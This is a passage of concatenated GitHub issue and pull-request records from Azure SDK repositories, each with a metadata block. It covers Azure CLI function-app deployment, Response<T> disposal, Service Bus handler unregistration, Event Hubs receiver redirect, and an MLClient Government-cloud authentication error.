$'az functionapp create -p {_appPlanName} --name {_globalFunctionName} --resource-group {_resourceGroupName} --runtime dotnet --storage-account {_storageAccountName} --functions-version 4'
$'az functionapp deployment source config-zip -g {_resourceGroupName} -n {_globalFunctionName} --src {_zipName}'
Looks like there's SDK Microsoft.Azure.Management.AppService could create and deploy web app, but there's no example for this. Could you please share some example for C# SDK creation of Azure function, SDK deploy of Azure function and SDK deploy of web app
Thanks
Environment
No response
function app is one kind of web site.
Here is an example of web site creation. Need to set Kind as functionapp to create a function app, and you might experiment more if you can fit the settings for function app into WebSiteData
I did not find any SDK regarding the deployment though.
It requires details of the service itself, so it would be best to involve the service team to provide a sample of the usage.
@jsquire Could you please help route this issue to service team for further assistance?
@live1206 : Service teams do not generally provide samples based on our SDKs. This is something that our team would own and coordinate with the service team directly, if needed. Please work with @ArthurMa1978 to determine next steps.
Hi @Arvinorange. Unfortunately, this repository is focused on the Azure SDK for .NET, service teams do not monitor these issues. To involve the service team, your best path forward would be to open an Azure support request.
@live1206 : Service teams do not generally provide samples based on our SDKs. This is something that our team would own and coordinate with the service team directly, if needed. Please work with @ArthurMa1978 to determine next steps.
@jsquire AFAIK, The sample of how to use SDK for a specific scenario is auto-generated based on examples in Spec repo.
The service team need to provide us a detailed example of the request and response how to create a function app.
If we take a look at the example of CreateOrUpdateStaticSiteBuildFunctionAppSettings, it generated a sample CreateOrUpdateAppSettings_CreatesOrUpdatesTheFunctionAppSettingsOfAStaticSiteBuild, which does not provide any details regarding how to create a function app with .NET SDK.
I have checked with @ArthurMa1978 we can't do anything here if the service team doesn't provide the scenario example with details.
|
2025-04-01T06:36:45.352585
| 2019-08-13T22:11:14
|
480393080
|
{
"authors": [
"j82w",
"pakrym"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:350",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/issues/7286"
}
|
gharchive/issue
|
[BUG] Azure.Core.ResponseOfT contains disposable Response
Describe the bug
Response<T> contains a disposable Response property. There is no way to dispose of the inner Response object. This is a memory leak and will cause additional overhead for garbage collection.
Information Checklist
Kindly make sure that you have added all the following information above and checkoff the required fields otherwise we will treat the issuer as an incomplete report
[x] Bug Description Added
[x] Repro Steps Added
[x] Setup information Added
@pakrym this is related to the recent PR
Not disposing a reference doesn't cause a memory leak as long as it doesn't hold any common/unmanaged resources without having a finalizer.
In the case of the Response the only part that holds onto shared resource is the content stream. It also depends if response buffering is enabled:
In the case where buffering is enabled the process of buffering itself would dispose the underlying stream and avoid resource leak, buffered stream is just a memory stream and can be collected.
In the case where buffering is disabled, it's clients responsibility to either dispose Response it got from the pipeline or return Response where T is IDisposable and consumer of the client SDK has to dispose the value.
In addition not disposing something doesn't add any GC overhead because no matter if an object is disposed GC still has to walk the graph and collect it.
Response ContentStream is a Stream. There is no guarantee that it is a MemoryStream. Does Response need to be updated to be MemoryStream instead of Stream?
How will users know that there is inner property that needs to be disposed of?
Would a better solution be to use Memory or Span instead of Stream? It would remove all the dispose logic and it would give better performance.
The response should be able to handle both buffered and streamed responses, Memory or MemoryStream would only work for buffered responses.
We know that Response.ContentStream would be MemoryStream for buffered responses because we control the buffering logic and create the stream.
Any reason not to make ChannelEnumerableSubscription itself IAsyncEnumerator ?
My issues with this is it is dependent on a implementation detail, and not the contract. If someone changes that implementation in the future then this will be broken. There is also no way for users to know if they need to dispose of the inner stream or not to dispose of it.
What scenario requires supporting stream? Would users actually get better use out of always having a buffered Memory object?
My issues with this is it is dependent on a implementation detail, and not the contract. If someone changes that implementation in the future then this will be broken. There is also no way for users to know if they need to dispose of the inner stream or not to dispose of it.
Users never have to dispose the inner stream. Users only need to dispose something when the return type is Response then they have to dispose the response.Value.
What scenario requires supporting stream? Would users actually get better use out of always having a buffered Memory object?
Downloading large files from blob storage, for example.
Users never have to dispose the inner stream. Users only need to dispose something when the return type is Response then they have to dispose the response.Value.
I'm a little confused here. Response<T> has an inner Response object that is disposable. If Response contains a network or some other Stream type that needs to be disposed of how is it getting disposed of?
I'm a little confused here. Response has an inner Response object that is disposable. If Response contains a network stream or some other stream type that needs to be disposed of how is it getting disposed of?
We are controlling the clients and the pipeline and wouldn't return Response that has a network stream in it.
|
2025-04-01T06:36:45.363122
| 2020-08-06T22:54:54
|
674646306
|
{
"authors": [
"DorothySun216",
"RicoBakels",
"SeanFeldman",
"sidkri"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:351",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/14021"
}
|
gharchive/pull-request
|
Enable a way to Unregister Message Handler and Session Handler
Currently our SDK doesn't support a way to unregister message handler and session handler so customers are getting ObjectDisposedException exceptions when receivers are closed due to connection closed caused by regular application upgrades etc. Exposing this functionality to unregister handler and await for pending receives and message handling operations to finish to allow for a graceful unregister on the handler they previously registered. Customer are expected to call this function before they close down their handler. Customer can register again after unregister as they are independent operations.
Is there an issue that discusses this change? Given this is a new feature I'd expect to see some transparency about it.
/cc @JoshLove-msft @jsquire
@SeanFeldman Hi Sean! Thanks for your comments. This is only a draft PR. This is a feature request from Azure Functions team. I will create an issue to discuss this to allow more transparency in design.
I have validated a version of these changes (commit "fbd31d0") with Azure Functions Service Bus extension and did not find any issues. Tested the following methods:
QueueClient.UnregisterSessionHandlerAsync(TimeSpan)
SubscriptionClient.UnregisterSessionHandlerAsync(TimeSpan)
3 MessageReceiver.UnregisterMessageHandlerAsync(TimeSpan)
I also attempted to call SubscriptionClient.RegisterSessionHandler() while SubscriptionClient.UnregisterSessionHandlerAsync(TimeSpan) was processing and got an exception as expected. Calling RegisterSessionHandler() after UnregisterSessionHandlerAsync(TimeSpan) completed worked normally as expected.
Nice work @DorothySun216! Approving from my side.
used version: 4.2.1
I want to use UnregisterMessageHandler to "pause" the ISubscriptionClient. aka stop processing messages from the Service Bus for a while. The only problem I encounter, is that after I unregister and try to re-register a handler, the runningTaskCancellationTokenSource in MessageReceiver.cs does not get a new instance, but keeps using the disposed one. That is why I get the following exception:
System.ObjectDisposedException: The CancellationTokenSource has been disposed.
Suggestion to also re-instantiate the runningTaskCancellationTokenSource just like the receivePumpCancellationTokenSource in MessageReceiver.cs (line 1333).
used version: 4.2.1
I want to use UnregisterMessageHandler to "pause" the ISubscriptionClient. aka stop processing messages from the Service Bus for a while. The only problem I encounter, is that after I unregister and try to re-register a handler, the runningTaskCancellationTokenSource in MessageReceiver.cs does not get a new instance, but keeps using the disposed one. That is why I get the following exception:
System.ObjectDisposedException: The CancellationTokenSource has been disposed.
Suggestion to also re-instantiate the runningTaskCancellationTokenSource just like the receivePumpCancellationTokenSource in MessageReceiver.cs (line 1333).
@RicoBakels thanks for reaching out. Are you using our service bus SDK directly or using Azure Functions?
@RicoBakels thanks for reaching out. Are you using our service bus SDK directly or using Azure Functions?
@DorothySun216 I am using the service bus SDK
@DorothySun216 I am using the service bus SDK
@RicoBakels I see. I will work on a repro. Can you show a code snippet for your use case if it is convenient?
@RicoBakels I see. I will work on a repro. Can you show a code snippet for your use case if it is convenient?
@DorothySun216 Thanks for the fast reply. Here is a code snipped where I use the ISubscriptionClient in my class.
At startup of the (Service Fabric) service, The message handler will get registered with the OpenAsync method. When for some reason the service needs to stop handling messages from the Service Bus for a while, the service needs to pause the handling of messages by calling the Pause method.
Then when the service needs to start handling messages again, I call the OpenAsync method again to register the handler.
// (re-)register message handler.
public Task<string> OpenAsync(CancellationToken cancellationToken)
{
_logger.LogInformation("AzureServiceBusReaderService starting");
var messageHandlerOptions = new MessageHandlerOptions(ExceptionReceivedHandlerAsync)
{
MaxConcurrentCalls = 1,
AutoComplete = false
};
_subscriptionClient.RegisterMessageHandler(ProcessMessagesAsync, messageHandlerOptions);
return Task.FromResult(_subscriptionClient.SubscriptionName);
}
// Unregister message handler so messages won't get picket up from Service Bus.
public void Pause() => _subscriptionClient.UnregisterMessageHandlerAsync(TimeSpan.FromSeconds(1));
@DorothySun216 Thanks for the fast reply. Here is a code snipped where I use the ISubscriptionClient in my class.
At startup of the (Service Fabric) service, The message handler will get registered with the OpenAsync method. When for some reason the service needs to stop handling messages from the Service Bus for a while, the service needs to pause the handling of messages by calling the Pause method.
Then when the service needs to start handling messages again, I call the OpenAsync method again to register the handler.
// (re-)register message handler.
public Task<string> OpenAsync(CancellationToken cancellationToken)
{
_logger.LogInformation("AzureServiceBusReaderService starting");
var messageHandlerOptions = new MessageHandlerOptions(ExceptionReceivedHandlerAsync)
{
MaxConcurrentCalls = 1,
AutoComplete = false
};
_subscriptionClient.RegisterMessageHandler(ProcessMessagesAsync, messageHandlerOptions);
return Task.FromResult(_subscriptionClient.SubscriptionName);
}
// Unregister message handler so messages won't get picket up from Service Bus.
public void Pause() => _subscriptionClient.UnregisterMessageHandlerAsync(TimeSpan.FromSeconds(1));
|
2025-04-01T06:36:45.365341
| 2023-06-21T20:33:07
|
1768431109
|
{
"authors": [
"amnguye",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:352",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/37153"
}
|
gharchive/pull-request
|
Created wrapper class which contains information to rehydrate
Moved around dependencies, job plan models to create Checkpointer internally as well.
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.Storage.DataMovement
|
2025-04-01T06:36:45.366427
| 2023-11-14T00:51:38
|
1991741851
|
{
"authors": [
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:353",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/39967"
}
|
gharchive/pull-request
|
Increment version for storage releases
Increment package version after release of Azure.Storage.Common
API change check
API changes are not detected in this pull request.
|
2025-04-01T06:36:45.369962
| 2024-03-12T21:30:15
|
2182714546
|
{
"authors": [
"azure-sdk",
"fangchen0601"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:354",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/42642"
}
|
gharchive/pull-request
|
[ACS][CallAutomation]Move SourceCallerIdNumber from Answer to Transfer api
Contributing to the Azure SDK
Please see our CONTRIBUTING.md if you are not familiar with contributing to this repository or have questions.
For specific information about pull request etiquette and best practices, see this section.
Run autorest to updated a lot models include media teams work
In CallMedia.cs, StartHoldMusicAsync and StartHoldMusic is updated to pass the build and left comment for media team to work on the StartHoldMusicOptions.Loop and operationCallbackUri
Move SourceCallerIdNumber from Answer to Transfer api
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.Communication.CallAutomation
|
2025-04-01T06:36:45.372859
| 2024-06-05T03:03:22
|
2334798863
|
{
"authors": [
"azure-sdk",
"yuc-Li"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:355",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/44393"
}
|
gharchive/pull-request
|
[HDInsight on AKS] Api version 2024-05-01 support
Contributing to the Azure SDK
Support api version 2024-05-01.
Preview to Stable.
Please see our CONTRIBUTING.md if you are not familiar with contributing to this repository or have questions.
For specific information about pull request etiquette and best practices, see this section.
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.ResourceManager.HDInsight.Containers
The GA plan has changed. Stop this thread. Thanks.
|
2025-04-01T06:36:45.375262
| 2024-09-20T23:45:43
|
2539821981
|
{
"authors": [
"KrzysztofCwalina",
"azure-sdk"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:356",
"repo": "Azure/azure-sdk-for-net",
"url": "https://github.com/Azure/azure-sdk-for-net/pull/46106"
}
|
gharchive/pull-request
|
AZD-CM integration
Added the ability to provision CDK CM infrastructure using azd.
Steps to try it:
Execute the CloudMachineTests.Configure (this will create bicep files from the CM CDK)
In the test's bin folder, run azd init
pick "Minimal" template
you can now do azd provision
API change check
APIView has identified API level changes in this PR and created following API reviews.
Azure.Provisioning.CloudMachine
|
2025-04-01T06:36:45.386272
| 2020-03-13T17:56:48
|
580757152
|
{
"authors": [
"chradek",
"yunhaoling"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:357",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/10296"
}
|
gharchive/issue
|
[event hubs] support receiver redirect
Background
The Event Hubs service supports redirects for amqp receiver links. When the client creates an amqp receiver link with redirects enabled, the service will respond with an amqp:link:redirect error if it also supports redirects. The error contains the information needed to create a new connection to the service.
The main benefit of receiver redirect is it allows a more direct connection to the host actually sending events to the client which should reduce latency.
API changes
The Event Hub clients responsible for consuming events (e.g. EventHubConsumerClient) should accept a new option to enable redirect that has a default value of false.
Proposal:
{ enableRedirect: true } // new option 'enableRedirect'
Reasoning
It is important to make this option opt-in for 2 reasons:
Currently 1 client creates 1 connection. This changes this assumption to 1 client can create many connections. This has implications since there is a limit to the number of connections that can be open at one time to an Event hub.
By default the SDK speaks AMQP over ports 5671/5672. With redirect enabled, new connections may be made on ports 104xx. Users may need to update their firewall rules to support redirect:
https://docs.microsoft.com/en-us/azure/service-bus-messaging/service-bus-amqp-protocol-guide#amqp-outbound-port-requirements
Details
Redirect walkthrough
User instantiates a consumer client with redirect enabled.
User makes call to receive events (this causes a receiver link to be created using customer-provided credential/host info).
Connection/cbs session/receiver link are created.
The receiver link must have amqp:link:redirect included in the list of desired_capabilities if redirect is enabled.
This must be omitted if redirect is not enabled.
The receiver link recieves a LinkRedirectError.
The SDK parses the hostname/port/address info from the error.
A new amqp connection is created using the hostname/port from the error.
When the cbs session is created, the applicationProperties.name value should be the address extracted from the LinkRedirectError.
The SDK creates the receiver link on the new connection and begins receiving events.
Considerations
It is possible for every receiver link to have different hostname/port/address values from one another in the LinkRedirectError. You may create a new connection for every LinkRedirectError. Optionally, you may use a connection for multiple receiver links if the links share a hostname/port.
Creating a new connection for each redirect is simpler to implement because it is easier to know when the connection should be closed, but does potentially increase connection density.
When to re-use the original connection?
It is possible that the server node used for receiving events can change. When the SDK sees an amqp:connection:forced error from the service, or the connection is closed, then the original connection should be used to create a new receiver link. At this point a new LinkRedirectError should be received and the redirect walkthrough can be followed.
Otherwise, for transient issues the connection created for the link after a LinkRedirectError can be re-used.
Reference
There is a draft PR for the JavaScript SDK that has the basics implemented for this feature.
https://github.com/Azure/azure-sdk-for-js/pull/7782
goal for April: design
|
2025-04-01T06:36:45.400303
| 2021-01-26T19:14:31
|
794491432
|
{
"authors": [
"00Kai0",
"ludokriss",
"xiangyan99"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:358",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/16356"
}
|
gharchive/issue
|
[API Management Management] Impossible to create new API using sdk
Package Name: Azure management Api Management
Package Version: 1.0.0
Operating System: Windows
Python Version: 3.7
Describe the bug
It seems as the api management client has a bug when trying to create or update an API. The package tries to poll for a result but includes uneccessary data in the request which throws an error in the aiohttp package
To Reproduce
Steps to reproduce the behavior:
Create a client for interacting with API management
creds = DefaultAzureCredential()
client = ApiManagementClient(
credential=creds, subscription_id=settings.subscription_id
)
create a version set
api_version_set=client.api_version_set.create_or_update(
resource_group_name=settings.resource_group_name,
service_name=settings.api_management_name,
version_set_id="anystuff",
parameters=ApiVersionSetContract(
display_name="title",
versioning_scheme="Segment",
description="Version configuration",
),
)
And then create any form of API.
api=client.api.begin_create_or_update(
resource_group_name=settings.resource_group_name,
service_name=settings.api_management_name,
api_id="wss-mp-test-order",
parameters=get_parameters(oai, api_version_set.id),
)
This throws an error:
return _RequestContextManager(self._request(method, url, **kwargs))
TypeError: _request() got an unexpected keyword argument 'path_format_arguments'
which, as far as I can see, results from these lines in the sdk:
https://github.com/Azure/azure-sdk-for-python/blob/79a64bb9d40610d1696819a2595a49d18d7a7ad6/sdk/apimanagement/azure-mgmt-apimanagement/azure/mgmt/apimanagement/aio/operations/_api_operations.py#L420-L427
where the path_format_arguments are interpreted in the end as parameters to the GET request polling for a result.
Expected behavior
A created API and successful response in the code
Screenshots
N/A
Additional context
I had to upgrade from 0.2.0 because of a different set of bugs (not reported yet, but at least one still persist). Now everything broke, even the things that I had a workaround for before.
Hi @ludokriss, this version of SDK is using a preview-version of API.
It seems that something have changed in service side.
We will update it in the near future.
@00Kai0 any updates?
|
2025-04-01T06:36:45.407320
| 2018-05-29T14:07:48
|
327337214
|
{
"authors": [
"ageorgou",
"lmazuel"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:359",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/2644"
}
|
gharchive/issue
|
Incorrect requirement for azure.mgmt.compute
It seems that the version requirement for azure-common~=1.1 in azure.mgmt.compute is too broad: new versions of the package reference azure.profiles, which was introduced in azure-common 1.1.9.
For example, if I try to install the latest version (4.0.0rc2) of azure.mgmt.common in an environment which already has a previous, older version of azure-common, the installation completes successfully but I can't import anything from the new package.
Steps to reproduce:
From a clean environment, install an older version of azure-common, then install the latest azure.mgmt.compute from source.
pip install "azure-common<=1.1.8"
git clone https://github.com/Azure/azure-sdk-for-python.git
pip install azure-sdk-for-python/azure-mgmt-compute
In a Python console, import the new package.
>>> import azure.mgmt.compute
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/Users/ageorgou/anaconda/envs/test-azure/lib/python3.6/site-packages/azure/mgmt/compute/__init__.py", line 8, in <module>
from .compute_management_client import ComputeManagementClient
File "/Users/ageorgou/anaconda/envs/test-azure/lib/python3.6/site-packages/azure/mgmt/compute/compute_management_client.py", line 16, in <module>
from azure.profiles import KnownProfiles, ProfileDefinition
ModuleNotFoundError: No module named 'azure.profiles'
Expected behaviour is for the import to work, as it successfully does with newer (>=1.1.9) versions of azure-common.
Hi @ageorgou
Yes you're right, I should write ~=1.1;>=1.1.9. I didn't notice since I do fresh env each time, but on update it won't work. Will fix it asap. Thanks!
Hi @lmazuel,
Yes, I only noticed this when updating an existing installation.
I was looking at this again and realised that it happens in other packages too. A quick search (grep "azure.profiles") shows:
azure-mgmt-compute
azure-mgmt-resource
azure-mgmt-storage
azure-mgmt-network
azure-mgmt-containerregistry
The last two already require specific versions. I have submitted a PR for the other three in case that makes things easier, but please feel free to ignore it if not!
Hi @ageorgou
I released storage this morning including the fix, so your PR conflicts :/. If you could remove storage from your PR, I'll merge it.
Thanks!
Hi @lmazuel, done now.
|
2025-04-01T06:36:45.457843
| 2022-10-25T21:51:05
|
1423159972
|
{
"authors": [
"adrian-gonzalez",
"harneetvirk",
"kottofy",
"xiangyan99"
],
"license": "MIT",
"license_source": "github-api",
"license_type": "permissive",
"provenance": "gharchive-dolma-0000.json.gz:360",
"repo": "Azure/azure-sdk-for-python",
"url": "https://github.com/Azure/azure-sdk-for-python/issues/27038"
}
|
gharchive/issue
|
Failing to find Subscription ID when targeting AzureUSGovernment Tenant
Package Name: MLClient
Package Version: SDK V2
Operating System: AML Compute Instance STANDARD_DS11_V2
Python Version: Python 3.10
Describe the bug
After initializing an instance of the MLClient module, executing any of it's methods results in the error below.
To Reproduce
Steps to reproduce the behavior:
Pre-requirements:
Have an AzureUSGovernment tenant and subscrition
Have an AML Workspace created, along with a Compute Instance
Have a Service Principal created in the above subscription, and given a "Contributor" role assignment to the AML Workspace
Run a notebook in AML using the compute instance, and updating the placeholder environment variables:
from azure.ai.ml.entities import AmlCompute
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential, AzureAuthorityHosts, EnvironmentCredential
import traceback
# Set ENV Variables
os.environ["AZURE_CLIENT_SECRET"] = "<value>"
os.environ["AZURE_CLIENT_ID"] = "<value>"
os.environ["AZURE_TENANT_ID"] = "<value>"
os.environ["AZURE_AUTHORITY_HOST"] = AzureAuthorityHosts.AZURE_GOVERNMENT
credentials = DefaultAzureCredential(
interactive_browser_tenant_id=os.environ["AZURE_TENANT_ID"],
authority=AzureAuthorityHosts.AZURE_GOVERNMENT
)
ml_client = MLClient(
credential=credentials,
subscription_id="<value>",
resource_group_name="<value>",
workspace_name="<value>",
cloud="AzureUSGovernment",
)
# Name assigned to the compute cluster
cpu_compute_target = "cpu-cluster-2"
try:
# let's see if the compute target already exists
cpu_cluster = ml_client.compute.get(cpu_compute_target)
print(
f"You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
)
except Exception:
print("Creating a new cpu compute target...")
# Let's create the Azure ML compute object with the intended parameters
cpu_cluster = AmlCompute(
name=cpu_compute_target,
# Azure ML Compute is the on-demand VM service
type="amlcompute",
# VM Family
size="STANDARD_DS3_V2",
# Minimum running nodes when there is no job running
min_instances=0,
# Nodes in cluster
max_instances=4,
# How many seconds will the node running after the job termination
idle_time_before_scale_down=180,
# Dedicated or LowPriority. The latter is cheaper but there is a chance of job termination
tier="Dedicated",
)
# Now, we pass the object to MLClient's create_or_update method
cpu_cluster = ml_client.compute.begin_create_or_update(cpu_cluster)
print(
f"AMLCompute with name {cpu_cluster.name} is created, the compute size is {cpu_cluster.size}"
)
Expected behavior
The above code should result in either a new CPU Cluster being created, or printing out the message You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
Screenshots
The actual behavior is an error:
ResourceNotFoundError: (SubscriptionNotFound) The subscription 'xxxxxxxxxxxxxxxx' could not be found.
Code: SubscriptionNotFound
Message: The subscription 'xxxxxxxxxxxxxxxx' could not be found.
The stack trace is:
Creating a new cpu compute target...
---------------------------------------------------------------------------
ResourceNotFoundError Traceback (most recent call last)
Input In [8], in <cell line: 13>()
13 try:
14 # let's see if the compute target already exists
---> 15 cpu_cluster = ml_client_6.compute.get(cpu_compute_target)
16 print(
17 f"You already have a cluster named {cpu_compute_target}, we'll reuse it as is."
18 )
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_telemetry/activity.py:169, in monitor_with_activity.<locals>.monitor.<locals>.wrapper(*args, **kwargs)
168 with log_activity(logger, activity_name or f.__name__, activity_type, custom_dimensions):
--> 169 return f(*args, **kwargs)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_operations/compute_operations.py:75, in ComputeOperations.get(self, name)
67 """Get a compute resource
68
69 :param name: Name of the compute
(...)
72 :rtype: Compute
73 """
---> 75 response, rest_obj = self._operation.get(
76 self._operation_scope.resource_group_name,
77 self._workspace_name,
78 name,
79 cls=get_http_response_and_deserialized_from_pipeline_response,
80 )
81 # TODO: Remove warning logging after 05/31/2022 (Task 1776012)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/tracing/decorator.py:83, in distributed_trace.<locals>.decorator.<locals>.wrapper_use_tracer(*args, **kwargs)
82 if span_impl_type is None:
---> 83 return func(*args, **kwargs)
85 # Merge span is parameter is set, but only if no explicit parent are passed
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_restclient/v2022_01_01_preview/operations/_compute_operations.py:577, in ComputeOperations.get(self, resource_group_name, workspace_name, compute_name, **kwargs)
576 if response.status_code not in [200]:
--> 577 map_error(status_code=response.status_code, response=response, error_map=error_map)
578 error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/exceptions.py:105, in map_error(status_code, response, error_map)
104 error = error_type(response=response)
--> 105 raise error
ResourceNotFoundError: (SubscriptionNotFound) The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
Code: SubscriptionNotFound
Message: The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
During handling of the above exception, another exception occurred:
ResourceNotFoundError Traceback (most recent call last)
Input In [8], in <cell line: 13>()
24 cpu_cluster = AmlCompute(
25 name=cpu_compute_target,
26 # Azure ML Compute is the on-demand VM service
(...)
37 tier="Dedicated",
38 )
40 # Now, we pass the object to MLClient's create_or_update method
---> 41 cpu_cluster = ml_client_6.compute.begin_create_or_update(cpu_cluster)
43 print(
44 f"AMLCompute with name {cpu_cluster.name} is created, the compute size is {cpu_cluster.size}"
45 )
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_telemetry/activity.py:169, in monitor_with_activity.<locals>.monitor.<locals>.wrapper(*args, **kwargs)
166 @functools.wraps(f)
167 def wrapper(*args, **kwargs):
168 with log_activity(logger, activity_name or f.__name__, activity_type, custom_dimensions):
--> 169 return f(*args, **kwargs)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_operations/compute_operations.py:116, in ComputeOperations.begin_create_or_update(self, compute, **kwargs)
107 @monitor_with_activity(logger, "Compute.BeginCreateOrUpdate", ActivityType.PUBLICAPI)
108 def begin_create_or_update(self, compute: Compute, **kwargs: Any) -> LROPoller:
109 """Create a compute
110
111 :param compute: Compute definition.
(...)
114 :rtype: LROPoller
115 """
--> 116 compute.location = self._get_workspace_location()
117 compute._set_full_subnet_name(self._operation_scope.subscription_id, self._operation_scope.resource_group_name)
119 compute_rest_obj = compute._to_rest_object()
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_operations/compute_operations.py:308, in ComputeOperations._get_workspace_location(self)
307 def _get_workspace_location(self) -> str:
--> 308 workspace = self._workspace_operations.get(self._resource_group_name, self._workspace_name)
309 return workspace.location
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/tracing/decorator.py:83, in distributed_trace.<locals>.decorator.<locals>.wrapper_use_tracer(*args, **kwargs)
81 span_impl_type = settings.tracing_implementation()
82 if span_impl_type is None:
---> 83 return func(*args, **kwargs)
85 # Merge span is parameter is set, but only if no explicit parent are passed
86 if merge_span and not passed_in_parent:
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/ai/ml/_restclient/v2022_01_01_preview/operations/_workspaces_operations.py:615, in WorkspacesOperations.get(self, resource_group_name, workspace_name, **kwargs)
612 response = pipeline_response.http_response
614 if response.status_code not in [200]:
--> 615 map_error(status_code=response.status_code, response=response, error_map=error_map)
616 error = self._deserialize.failsafe_deserialize(_models.ErrorResponse, pipeline_response)
617 raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
File /anaconda/envs/azureml_py310_sdkv2/lib/python3.10/site-packages/azure/core/exceptions.py:105, in map_error(status_code, response, error_map)
103 return
104 error = error_type(response=response)
--> 105 raise error
Additional context
I looked through the source code in _azure_environments.py file and also the _ml_client.py file to infer what environment variables and values I needed to pass into the MLClient constructor. However, something doesn't appear to be working correctly.
Here is an example for running a notebook in Non-public cloud: https://github.com/Azure/azureml-examples/blob/main/sdk/python/jobs/multicloud-configuration.ipynb
You may need to pass the cloud name in the kwargs for MLClient.
# NOTE: cloud parameter is required in kwargs to signal mlclient to connect to the appropriate endpoints in Azure.
kwargs = {"cloud": "AzureChinaCloud"}
ml_client = MLClient(credential, subscription_id, resource_group, **kwargs)
Hi @harneetvirk , unfortunately I am still facing the same error.
Below is my latest attempt.
First I make sure that the authentication works (replacing the placeholder values with the correct values)
from azure.ai.ml.entities import AmlCompute
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential, AzureAuthorityHosts
# Set ENV Variables
os.environ["AZURE_USERNAME"] = "xxxxxxxxx"
os.environ["AZURE_PASSWORD"] = "xxxxxxxxx"
os.environ["AZURE_TENANT_ID"] = "xxxxxxxxxx"
kwargs = {"cloud": "AzureUSGovernment"}
credentials = DefaultAzureCredential(authority=AzureAuthorityHosts.AZURE_GOVERNMENT)
credentials.get_token("https://management.usgovcloudapi.net/.default")
This results in a successful authentication and token retrieval.
But then running the below command, after putting in the correct subscription ID, using the ML Client errors out.
ml_client = MLClient(
credential=credentials,
subscription_id="xxxxxxxxx",
resource_group_name="xxxxxxxx",
workspace_name="xxxxxxx",
**kwargs,
)
print(ml_client)
# Get a list of workspaces in a resource group
for ws in ml_client.workspaces.list():
print(ws.name, ":", ws.location, ":", ws.description)
error is
ResourceNotFoundError: (SubscriptionNotFound) The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
Code: SubscriptionNotFound
Message: The subscription '50ff9458-6372-4522-8227-327043deaef5' could not be found.
I can perform the following in an Azure US Gov ML Studio notebook targeting Python 3.10 - SDK V2 (default Compute) and it works.
Seems like there is a default version installed of azure-ai-ml at 2.4.1 that might be causing some issues.
---------CELL 1---------
pip list | grep azure
Output:
azure-ai-ml 2.4.1
azure-common 1.1.28
azure-core 1.22.1
azure-identity 1.10.0
azure-mgmt-core 1.3.0
azure-ml 2.3.1
azure-storage-blob 12.9.0
azure-storage-file-share 12.7.0
Note: you may need to restart the kernel to use updated packages.
---------CELL 2---------
pip uninstall azure-ai-ml azure-ml -y
Output:
Found existing installation: azure-ai-ml 2.4.1
Uninstalling azure-ai-ml-2.4.1:
Successfully uninstalled azure-ai-ml-2.4.1
Found existing installation: azure-ml 2.3.1
Uninstalling azure-ml-2.3.1:
Successfully uninstalled azure-ml-2.3.1
Note: you may need to restart the kernel to use updated packages.
---------CELL 3---------
pip install --pre azure-ai-ml
Output:
Collecting azure-ai-ml
Downloading azure_ai_ml-1.0.0-py3-none-any.whl (4.0 MB)
